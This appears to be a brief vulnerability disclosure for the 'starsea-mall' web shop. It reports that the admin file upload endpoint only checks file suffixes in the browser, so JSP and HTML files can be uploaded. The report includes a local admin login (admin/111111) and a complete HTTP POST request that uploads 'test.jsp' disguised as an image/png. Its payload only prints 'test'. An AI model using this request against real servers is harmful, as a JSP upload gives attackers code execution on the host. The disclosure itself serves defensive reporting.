starsea-mall has any file uploaded

[LvZCh]

Vulnerability details:
The upload method in src/main/java/com/siro/mall/controller/common/uploadController. java does not restrict the uploaded files, allowing attackers to upload JSP and HTML files

http://192.168.0.102:8080/admin/#
admin/111111
Open: http://192.168.0.104:8080/admin/goods

Only the front-end verification file suffix was done at this location

Can upload JSP files

POST /admin/upload/file HTTP/1.1
Host: 192.168.0.102:8080
Content-Length: 207
Cache-Control: max-age=0
Origin: http://192.168.0.102:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEKBH2vvGTntw3rk
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.102:8080/admin/goods/edit/10906
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=432EE68025FC82650899B55F1F50F5F9
Connection: close

------WebKitFormBoundaryWEKBH2vvGTntw3rk
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: image/png

<% out.println("test"); %>
------WebKitFormBoundaryWEKBH2vvGTntw3rk--

You can also upload HTML files